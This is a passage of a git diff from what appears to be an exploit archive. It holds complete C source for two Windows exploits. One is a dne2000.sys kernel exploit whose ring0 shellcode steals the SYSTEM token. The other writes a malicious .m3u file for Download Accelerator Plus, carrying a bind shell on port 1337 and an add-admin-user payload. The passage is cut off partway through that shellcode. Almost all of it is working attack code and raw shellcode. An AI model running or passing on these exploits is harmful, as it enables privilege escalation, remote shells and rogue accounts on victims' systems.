-      fprintf (stderr, "Usage: %s \n", argv[0]);
-      exit (EXIT_SUCCESS);
-    }
-
-  ppid = atoi (argv[1]);
-
-  hFile = CreateFileA ("\\\\.\\DNE", FILE_EXECUTE,
-                       FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
-                       OPEN_EXISTING, 0, NULL);
-  if (hFile == INVALID_HANDLE_VALUE)
-    {
-      fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
-      exit (EXIT_FAILURE);
-    }
-
-  zpage = VirtualAlloc (NULL, 0x10000, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-  if (zpage == NULL)
-    {
-      fprintf (stderr, "* VirtualAlloc failed\n");
-      exit (EXIT_FAILURE);
-    }
-  printf ("* allocated page: 0x%08X [%d-bytes]\n",
-          zpage, 0x10000);
-
-  memset (zpage, 0xCC, 0x10000);
-  zbuf = fixup_ring0_shell (ppid, &zlen);
-  memcpy (zpage, win32_fixup, sizeof (win32_fixup) - 1);
-  memcpy (zpage + sizeof (win32_fixup) - 1, zbuf, zlen);
-  memcpy (zpage + sizeof (win32_fixup) + zlen - 1,
-          win32_ret, sizeof (win32_ret) - 1);
-
-  memset (&req, 0, sizeof req);
-  req.req_num = DNE_FLAG;
-  req.ptr[0] = NULL;
-  req.ptr[1] = &items[0];
-
-  memset (items, 0, sizeof items);
-  items[0].flag = ITEM_FLAG_1;
-  items[0].item_ptr = &items[1];
-
-  items[1].flag = ITEM_FLAG_2;
-  items[1].item_func = &funcs;
-
-  memset (&funcs, 0, sizeof funcs);
-  funcs.flag = FUNC_FLAG;
-  funcs.func_ptr = zpage;
-
-  printf ("* req.ptr: 0x%08X\n", &items[0]);
-  printf ("* @0x%08X: flag: 0x%08X, item_ptr:  0x%08X\n",
-          &items[0], items[0].flag, items[0].item_ptr);
-  printf ("* @0x%08X: flag: 0x%08X, item_func: 0x%08X\n",
-          items[0].item_ptr, items[1].flag, items[1].item_func);
-  printf ("* @0x%08X: flag: 0x%08X, func_ptr:  0x%08X\n",
-          items[1].item_func, funcs.flag, funcs.func_ptr);
-
-  /* jump to our address   :)   */
-  printf ("* jumping.. ");
-  result = DeviceIoControl (hFile, DNE_IOCTL,
-                            &req, sizeof req, &req, sizeof req, &rlen, 0);
-  if (!result)
-    {
-      fprintf (stderr, "* DeviceIoControl failed\n");
-      exit (EXIT_FAILURE);
-    }
-  printf ("done\n\n"
-          "* hmmm, you didn't STOP the box?!?!\n");
-
-  CloseHandle (hFile);
-
-  return (EXIT_SUCCESS);
-}
-
-// milw0rm.com [2008-06-17]
+/* dne2000-call.c
+ *
+ * Copyright (c) 2008 by 
+ *
+ * Deterministic Network Enhancer (dne2000.sys) local kernel ring0 SYSTEM exploit
+ * by mu-b - Sun 06 Jan 2008
+ *
+ * - Tested on: dne2000.sys 2.21.7.233 <-> 3.21.7.17464
+ *     bundled with: SafeNET HighAssurance Remote, SoftRemote
+ *                   Cisco VPN Client
+ *                   Winproxy
+ *
+ * Compile: MinGW + -lntdll
+ *
+ *    - Private Source Code -DO NOT DISTRIBUTE -
+ * http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
+ */
+
+#include 
+#include 
+
+#include 
+#include 
+
+#define DNE_IOCTL     0x00222008
+#define DNE_FLAG      0x00001005
+
+#define ITEM_FLAG_1   0x4A424F4E
+#define ITEM_FLAG_2   0x47554C50
+#define FUNC_FLAG     0x00010003
+
+static unsigned char win32_fixup[] =
+  "\x56";
+
+static unsigned char win2k3_ring0_shell[] =
+  /* _ring0 */
+  "\xb8\x24\xf1\xdf\xff"
+  "\x8b\x00"
+  "\x8b\xb0\x18\x02\x00\x00"
+  "\x89\xf0"
+  /* _sys_eprocess_loop   */
+  "\x8b\x98\x94\x00\x00\x00"
+  "\x81\xfb\x04\x00\x00\x00"
+  "\x74\x11"
+  "\x8b\x80\x9c\x00\x00\x00"
+  "\x2d\x98\x00\x00\x00"
+  "\x39\xf0"
+  "\x75\xe3"
+  "\xeb\x21"
+  /* _sys_eprocess_found  */
+  "\x89\xc1"
+  "\x89\xf0"
+
+  /* _cmd_eprocess_loop   */
+  "\x8b\x98\x94\x00\x00\x00"
+  "\x81\xfb\x00\x00\x00\x00"
+  "\x74\x10"
+  "\x8b\x80\x9c\x00\x00\x00"
+  "\x2d\x98\x00\x00\x00"
+  "\x39\xf0"
+  "\x75\xe3"
+  /* _not_found           */
+  "\xcc"
+  /* _cmd_eprocess_found
+   * _ring0_end           */
+
+  /* copy tokens!$%!      */
+  "\x8b\x89\xd8\x00\x00\x00"
+  "\x89\x88\xd8\x00\x00\x00"
+  "\x90";
+
+static unsigned char winxp_ring0_shell[] =
+  /* _ring0 */
+  "\xb8\x24\xf1\xdf\xff"
+  "\x8b\x00"
+  "\x8b\x70\x44"
+  "\x89\xf0"
+  /* _sys_eprocess_loop   */
+  "\x8b\x98\x84\x00\x00\x00"
+  "\x81\xfb\x04\x00\x00\x00"
+  "\x74\x11"
+  "\x8b\x80\x8c\x00\x00\x00"
+  "\x2d\x88\x00\x00\x00"
+  "\x39\xf0"
+  "\x75\xe3"
+  "\xeb\x21"
+  /* _sys_eprocess_found  */
+  "\x89\xc1"
+  "\x89\xf0"
+
+  /* _cmd_eprocess_loop   */
+  "\x8b\x98\x84\x00\x00\x00"
+  "\x81\xfb\x00\x00\x00\x00"
+  "\x74\x10"
+  "\x8b\x80\x8c\x00\x00\x00"
+  "\x2d\x88\x00\x00\x00"
+  "\x39\xf0"
+  "\x75\xe3"
+  /* _not_found           */
+  "\xcc"
+  /* _cmd_eprocess_found
+   * _ring0_end           */
+
+  /* copy tokens!$%!      */
+  "\x8b\x89\xc8\x00\x00\x00"
+  "\x89\x88\xc8\x00\x00\x00"
+  "\x90";
+
+static unsigned char win32_ret[] =
+  "\x5e"
+  "\xc2\x10\x00";
+
+struct ioctl_func {
+  char  _pad[0x04];
+  int flag;
+  char __pad[0x2C];
+  void *func_ptr;
+};
+
+struct ioctl_item {
+  int flag;
+  char _pad[0x24];
+  struct ioctl_func *item_func;
+  struct ioctl_item *item_ptr;
+};
+
+struct ioctl_req {
+  int req_num;
+  struct ioctl_item *ptr[2];
+};
+
+static PCHAR
+fixup_ring0_shell (DWORD ppid, DWORD *zlen)
+{
+  DWORD dwVersion, dwMajorVersion, dwMinorVersion;
+
+  dwVersion = GetVersion ();
+  dwMajorVersion = (DWORD) (LOBYTE(LOWORD(dwVersion)));
+  dwMinorVersion = (DWORD) (HIBYTE(LOWORD(dwVersion)));
+
+  if (dwMajorVersion != 5)
+    {
+      fprintf (stderr, "* GetVersion, unsupported version\n");
+      exit (EXIT_FAILURE);
+    }
+
+  switch (dwMinorVersion)
+    {
+      case 1:
+        *zlen = sizeof winxp_ring0_shell - 1;
+        *(PDWORD) &winxp_ring0_shell[55] = ppid;
+        return (winxp_ring0_shell);
+
+      case 2:
+        *zlen = sizeof win2k3_ring0_shell - 1;
+        *(PDWORD) &win2k3_ring0_shell[58] = ppid;
+        return (win2k3_ring0_shell);
+
+      default:
+        fprintf (stderr, "* GetVersion, unsupported version\n");
+        exit (EXIT_FAILURE);
+    }
+
+  return (NULL);
+}
+
+int
+main (int argc, char **argv)
+{
+  struct ioctl_req req;
+  struct ioctl_item items[2];
+  struct ioctl_func funcs;
+  LPVOID zpage, zbuf;
+  DWORD rlen, zlen, ppid;
+  HANDLE hFile;
+  BOOL result;
+
+  printf ("Deterministic Network Enhancer (dne2000.sys) local kernel ring0 SYSTEM exploit\n"
+          "by: \n"
+          "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
+
+  if (argc <= 1)
+    {
+      fprintf (stderr, "Usage: %s \n", argv[0]);
+      exit (EXIT_SUCCESS);
+    }
+
+  ppid = atoi (argv[1]);
+
+  hFile = CreateFileA ("\\\\.\\DNE", FILE_EXECUTE,
+                       FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
+                       OPEN_EXISTING, 0, NULL);
+  if (hFile == INVALID_HANDLE_VALUE)
+    {
+      fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
+      exit (EXIT_FAILURE);
+    }
+
+  zpage = VirtualAlloc (NULL, 0x10000, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+  if (zpage == NULL)
+    {
+      fprintf (stderr, "* VirtualAlloc failed\n");
+      exit (EXIT_FAILURE);
+    }
+  printf ("* allocated page: 0x%08X [%d-bytes]\n",
+          zpage, 0x10000);
+
+  memset (zpage, 0xCC, 0x10000);
+  zbuf = fixup_ring0_shell (ppid, &zlen);
+  memcpy (zpage, win32_fixup, sizeof (win32_fixup) - 1);
+  memcpy (zpage + sizeof (win32_fixup) - 1, zbuf, zlen);
+  memcpy (zpage + sizeof (win32_fixup) + zlen - 1,
+          win32_ret, sizeof (win32_ret) - 1);
+
+  memset (&req, 0, sizeof req);
+  req.req_num = DNE_FLAG;
+  req.ptr[0] = NULL;
+  req.ptr[1] = &items[0];
+
+  memset (items, 0, sizeof items);
+  items[0].flag = ITEM_FLAG_1;
+  items[0].item_ptr = &items[1];
+
+  items[1].flag = ITEM_FLAG_2;
+  items[1].item_func = &funcs;
+
+  memset (&funcs, 0, sizeof funcs);
+  funcs.flag = FUNC_FLAG;
+  funcs.func_ptr = zpage;
+
+  printf ("* req.ptr: 0x%08X\n", &items[0]);
+  printf ("* @0x%08X: flag: 0x%08X, item_ptr:  0x%08X\n",
+          &items[0], items[0].flag, items[0].item_ptr);
+  printf ("* @0x%08X: flag: 0x%08X, item_func: 0x%08X\n",
+          items[0].item_ptr, items[1].flag, items[1].item_func);
+  printf ("* @0x%08X: flag: 0x%08X, func_ptr:  0x%08X\n",
+          items[1].item_func, funcs.flag, funcs.func_ptr);
+
+  /* jump to our address   :)   */
+  printf ("* jumping.. ");
+  result = DeviceIoControl (hFile, DNE_IOCTL,
+                            &req, sizeof req, &req, sizeof req, &rlen, 0);
+  if (!result)
+    {
+      fprintf (stderr, "* DeviceIoControl failed\n");
+      exit (EXIT_FAILURE);
+    }
+  printf ("done\n\n"
+          "* hmmm, you didn't STOP the box?!?!\n");
+
+  CloseHandle (hFile);
+
+  return (EXIT_SUCCESS);
+}
+
+// milw0rm.com [2008-06-17]
diff --git a/platforms/windows/local/6039.c b/platforms/windows/local/6039.c
index 18e856016..d211ca78f 100755
--- a/platforms/windows/local/6039.c
+++ b/platforms/windows/local/6039.c
@@ -1,150 +1,150 @@
-#include 
-#include 
-/*
-DAP 8.x (.m3u) File BOF C Exploit for XP SP2,SP3 English
- 
-SecurityFocus Advisory:
-Download Accelerator Plus (DAP) is prone to a buffer-overflow vulnerability 
-because it fails to perform adequate boundary checks on user-supplied input.
-Successfully exploiting this issue may allow remote attackers to execute 
-arbitrary code in the context of the application.Failed exploit attempts 
-will cause denial-of-service conditions.
-
-Vulnerability discoverd by Krystian Kloskowski (h07) 
-Original POC by h07 http://www.milw0rm.com/exploits/6030
-
-This poc will create a "special" .m3u file that when imported in DAP and then checked with 
-the verifiy button will cause a buffer overflow and  lead to exploitation.Run the program 
-with no args for usage info or just look in the code. :P
-
-Tested on Windows XP English sp2&sp3.
-
-C Exploit code by Shinnok raydenxy [at] yahoo dot com
-/*
-
-/* win32_bind -  EXITFUNC=seh LPORT=1337 Size=709 Encoder=PexAlphaNum http://metasploit.com */
-unsigned char bind_scode[] =
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e"
-"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x58"
-"\x4e\x36\x46\x32\x46\x52\x4b\x48\x45\x34\x4e\x43\x4b\x48\x4e\x57"
-"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x34\x4a\x51\x4b\x48"
-"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x38\x46\x33\x4b\x38"
-"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"
-"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
-"\x46\x4f\x4b\x33\x46\x45\x46\x52\x4a\x42\x45\x57\x45\x4e\x4b\x58"
-"\x4f\x55\x46\x42\x41\x50\x4b\x4e\x48\x56\x4b\x38\x4e\x30\x4b\x44"
-"\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x43\x30\x4e\x52\x4b\x48"
-"\x49\x38\x4e\x36\x46\x32\x4e\x51\x41\x36\x43\x4c\x41\x33\x4b\x4d"
-"\x46\x36\x4b\x38\x43\x54\x42\x53\x4b\x38\x42\x34\x4e\x50\x4b\x58"
-"\x42\x47\x4e\x51\x4d\x4a\x4b\x58\x42\x34\x4a\x50\x50\x55\x4a\x36"
-"\x50\x58\x50\x34\x50\x50\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x56"
-"\x43\x55\x48\x56\x4a\x36\x43\x53\x44\x33\x4a\x46\x47\x37\x43\x47"
-"\x44\x53\x4f\x55\x46\x45\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e"
-"\x4e\x4f\x4b\x53\x42\x35\x4f\x4f\x48\x4d\x4f\x55\x49\x48\x45\x4e"
-"\x48\x56\x41\x48\x4d\x4e\x4a\x30\x44\x30\x45\x35\x4c\x36\x44\x50"
-"\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55"
-"\x4f\x4f\x48\x4d\x43\x45\x43\x55\x43\x45\x43\x35\x43\x55\x43\x44"
-"\x43\x45\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x56\x4a\x36\x45\x50"
-"\x49\x43\x48\x56\x43\x45\x49\x58\x41\x4e\x45\x49\x4a\x56\x46\x4a"
-"\x4c\x31\x42\x37\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x31"
-"\x41\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42"
-"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x45\x45\x45\x4f\x4f\x42\x4d"
-"\x4a\x36\x45\x4e\x49\x34\x48\x48\x49\x44\x47\x55\x4f\x4f\x48\x4d"
-"\x42\x55\x46\x55\x46\x45\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x56"
-"\x47\x4e\x49\x37\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x45"
-"\x4f\x4f\x42\x4d\x48\x56\x4c\x46\x46\x46\x48\x56\x4a\x46\x43\x46"
-"\x4d\x46\x49\x38\x45\x4e\x4c\x36\x42\x35\x49\x55\x49\x42\x4e\x4c"
-"\x49\x58\x47\x4e\x4c\x46\x46\x54\x49\x58\x44\x4e\x41\x53\x42\x4c"
-"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x42\x50\x4f\x44\x34\x4e\x42"
-"\x43\x59\x4d\x48\x4c\x37\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
-"\x44\x57\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x47\x46\x44\x4f\x4f"
-"\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x35\x41\x55\x41\x35\x4c\x46"
-"\x41\x50\x41\x35\x41\x45\x45\x55\x41\x45\x4f\x4f\x42\x4d\x4a\x36"
-"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x46"
-"\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x58\x47\x35\x4e\x4f"
-"\x43\x58\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d"
-"\x4a\x56\x42\x4f\x4c\x58\x46\x30\x4f\x55\x43\x35\x4f\x4f\x48\x4d"
-"\x4f\x4f\x42\x4d\x5a";
-
-/* win32_adduser -  PASS=test EXITFUNC=seh USER=test Size=489 Encoder=PexAlphaNum http://metasploit.com */
-unsigned char user_scode[] =
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
-"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x33\x4b\x58\x4e\x57"
-"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x31\x4b\x58"
-"\x4f\x35\x42\x52\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48"
-"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c"
-"\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
-"\x46\x4f\x4b\x33\x46\x45\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x48"
-"\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x50\x4b\x54"
-"\x4b\x58\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x58"
-"\x41\x30\x4b\x4e\x49\x48\x4e\x35\x46\x52\x46\x30\x43\x4c\x41\x43"
-"\x42\x4c\x46\x46\x4b\x58\x42\x34\x42\x43\x45\x38\x42\x4c\x4a\x47"
-"\x4e\x30\x4b\x58\x42\x44\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a"
-"\x4b\x48\x4a\x36\x4a\x50\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b"
-"\x42\x30\x42\x30\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x55\x41\x43"
-"\x48\x4f\x42\x36\x48\x45\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x47"
-"\x42\x45\x4a\x36\x42\x4f\x4c\x58\x46\x30\x4f\x45\x4a\x36\x4a\x39"
-"\x50\x4f\x4c\x38\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x56\x4d\x46"
-"\x46\x46\x50\x42\x45\x56\x4a\x47\x45\x46\x42\x52\x4f\x52\x43\x36"
-"\x42\x32\x50\x46\x45\x46\x46\x57\x42\x52\x45\x47\x43\x37\x45\x36"
-"\x44\x37\x42\x32\x46\x37\x45\x36\x43\x47\x46\x37\x42\x42\x46\x37"
-"\x45\x36\x43\x37\x46\x37\x42\x52\x4f\x52\x41\x44\x46\x54\x46\x44"
-"\x42\x52\x48\x42\x48\x32\x42\x32\x50\x36\x45\x56\x46\x57\x42\x42"
-"\x4e\x36\x4f\x36\x43\x56\x41\x36\x4e\x56\x47\x46\x44\x37\x4f\x36"
-"\x45\x37\x42\x37\x42\x42\x41\x34\x46\x46\x4d\x56\x49\x56\x50\x46"
-"\x49\x56\x43\x57\x46\x37\x44\x37\x41\x56\x46\x47\x4f\x56\x44\x37"
-"\x43\x57\x42\x52\x46\x47\x45\x56\x43\x37\x46\x47\x42\x32\x4f\x52"
-"\x41\x34\x46\x34\x46\x34\x42\x30\x5a";
-
-
-
-unsigned char ra_sp2[] = "\xcf\xbc\x08\x76"; //msvcp60.dll
-unsigned char ra_sp3[] = "\xe1\xbc\x08\x76"; //msvcp60.dll
-
-unsigned char nops1[14115]; //14115 * \x90
-unsigned char nops2[30]; //30 * \x90
-
-int main(int argc, char **argv)
-{
-    int i;
-    FILE* f;
-    char* ra=NULL;
-    char* scode=NULL;
-    printf("[+] Download Accelerator Plus - DAP 8.x (.m3u) File Buffer Overflow Vulnerability\n");
-	printf("[+] Discovered by Krystian Kloskowski (h07) \n");
-	printf("[+] Code by Shinnok raydenxy[at]yahoo dot com\n");
-    if ((argc!=3)||((atoi(argv[1])!=0)&&(atoi(argv[1])!=1))||((atoi(argv[2])!=0)&&(atoi(argv[2])!=1))){
-            printf("Usage: %s target payload\n",argv[0]);
-            printf("Where target is:\n");
-            printf("0: WinXP SP2\n");
-            printf("1: WinXP SP3\n");
-            printf("Where payload is:\n");
-            printf("0: bind shell on 1337\n");
-            printf("1: add admin user \"test\" with password \"test\"\n");
-            return EXIT_SUCCESS;
-    }
-    for(i=0;i<14115;i++) nops1[i]='\x90';
-    nops1[14115]='\0';
-    for(i=0;i<30;i++) nops2[i]='\x90';
-    nops2[30]='\0';
-    if(atoi(argv[1])==0) ra=ra_sp2;
-    else ra=ra_sp3;
-    if(atoi(argv[2])==0) scode=bind_scode;
-    else scode=user_scode;
-    f=fopen("sploit.m3u","wb");    
-    fprintf(f,"http://localhost/%s%s%s%s.mp3%c%c",nops1,ra,nops2,scode,'\xd','\xa');
-    fflush(f);                         
-    fclose(f);
-    printf("sploit.m3u created!\n");
-    return EXIT_SUCCESS;
-}
-
-// milw0rm.com [2008-07-11]
+#include 
+#include 
+/*
+DAP 8.x (.m3u) File BOF C Exploit for XP SP2,SP3 English
+ 
+SecurityFocus Advisory:
+Download Accelerator Plus (DAP) is prone to a buffer-overflow vulnerability 
+because it fails to perform adequate boundary checks on user-supplied input.
+Successfully exploiting this issue may allow remote attackers to execute 
+arbitrary code in the context of the application.Failed exploit attempts 
+will cause denial-of-service conditions.
+
+Vulnerability discoverd by Krystian Kloskowski (h07) 
+Original POC by h07 http://www.milw0rm.com/exploits/6030
+
+This poc will create a "special" .m3u file that when imported in DAP and then checked with 
+the verifiy button will cause a buffer overflow and  lead to exploitation.Run the program 
+with no args for usage info or just look in the code. :P
+
+Tested on Windows XP English sp2&sp3.
+
+C Exploit code by Shinnok raydenxy [at] yahoo dot com
+/*
+
+/* win32_bind -  EXITFUNC=seh LPORT=1337 Size=709 Encoder=PexAlphaNum http://metasploit.com */
+unsigned char bind_scode[] =
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e"
+"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x58"
+"\x4e\x36\x46\x32\x46\x52\x4b\x48\x45\x34\x4e\x43\x4b\x48\x4e\x57"
+"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x34\x4a\x51\x4b\x48"
+"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x38\x46\x33\x4b\x38"
+"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"
+"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
+"\x46\x4f\x4b\x33\x46\x45\x46\x52\x4a\x42\x45\x57\x45\x4e\x4b\x58"
+"\x4f\x55\x46\x42\x41\x50\x4b\x4e\x48\x56\x4b\x38\x4e\x30\x4b\x44"
+"\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x43\x30\x4e\x52\x4b\x48"
+"\x49\x38\x4e\x36\x46\x32\x4e\x51\x41\x36\x43\x4c\x41\x33\x4b\x4d"
+"\x46\x36\x4b\x38\x43\x54\x42\x53\x4b\x38\x42\x34\x4e\x50\x4b\x58"
+"\x42\x47\x4e\x51\x4d\x4a\x4b\x58\x42\x34\x4a\x50\x50\x55\x4a\x36"
+"\x50\x58\x50\x34\x50\x50\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x56"
+"\x43\x55\x48\x56\x4a\x36\x43\x53\x44\x33\x4a\x46\x47\x37\x43\x47"
+"\x44\x53\x4f\x55\x46\x45\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e"
+"\x4e\x4f\x4b\x53\x42\x35\x4f\x4f\x48\x4d\x4f\x55\x49\x48\x45\x4e"
+"\x48\x56\x41\x48\x4d\x4e\x4a\x30\x44\x30\x45\x35\x4c\x36\x44\x50"
+"\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55"
+"\x4f\x4f\x48\x4d\x43\x45\x43\x55\x43\x45\x43\x35\x43\x55\x43\x44"
+"\x43\x45\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x56\x4a\x36\x45\x50"
+"\x49\x43\x48\x56\x43\x45\x49\x58\x41\x4e\x45\x49\x4a\x56\x46\x4a"
+"\x4c\x31\x42\x37\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x31"
+"\x41\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42"
+"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x45\x45\x45\x4f\x4f\x42\x4d"
+"\x4a\x36\x45\x4e\x49\x34\x48\x48\x49\x44\x47\x55\x4f\x4f\x48\x4d"
+"\x42\x55\x46\x55\x46\x45\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x56"
+"\x47\x4e\x49\x37\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x45"
+"\x4f\x4f\x42\x4d\x48\x56\x4c\x46\x46\x46\x48\x56\x4a\x46\x43\x46"
+"\x4d\x46\x49\x38\x45\x4e\x4c\x36\x42\x35\x49\x55\x49\x42\x4e\x4c"
+"\x49\x58\x47\x4e\x4c\x46\x46\x54\x49\x58\x44\x4e\x41\x53\x42\x4c"
+"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x42\x50\x4f\x44\x34\x4e\x42"
+"\x43\x59\x4d\x48\x4c\x37\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
+"\x44\x57\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x47\x46\x44\x4f\x4f"
+"\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x35\x41\x55\x41\x35\x4c\x46"
+"\x41\x50\x41\x35\x41\x45\x45\x55\x41\x45\x4f\x4f\x42\x4d\x4a\x36"
+"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x46"
+"\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x58\x47\x35\x4e\x4f"
+"\x43\x58\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d"
+"\x4a\x56\x42\x4f\x4c\x58\x46\x30\x4f\x55\x43\x35\x4f\x4f\x48\x4d"
+"\x4f\x4f\x42\x4d\x5a";
+
+/* win32_adduser -  PASS=test EXITFUNC=seh USER=test Size=489 Encoder=PexAlphaNum http://metasploit.com */
+unsigned char user_scode[] =
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
+"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x33\x4b\x58\x4e\x57"
+"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x31\x4b\x58"
+"\x4f\x35\x42\x52\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48"
+"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c"
+"\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
+"\x46\x4f\x4b\x33\x46\x45\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x48"
+"\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x50\x4b\x54"
+"\x4b\x58\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x58"
+"\x41\x30\x4b\x4e\x49\x48\x4e\x35\x46\x52\x46\x30\x43\x4c\x41\x43"
+"\x42\x4c\x46\x46\x4b\x58\x42\x34\x42\x43\x45\x38\x42\x4c\x4a\x47"
+"\x4e\x30\x4b\x58\x42\x44\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a"
+"\x4b\x48\x4a\x36\x4a\x50\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b"
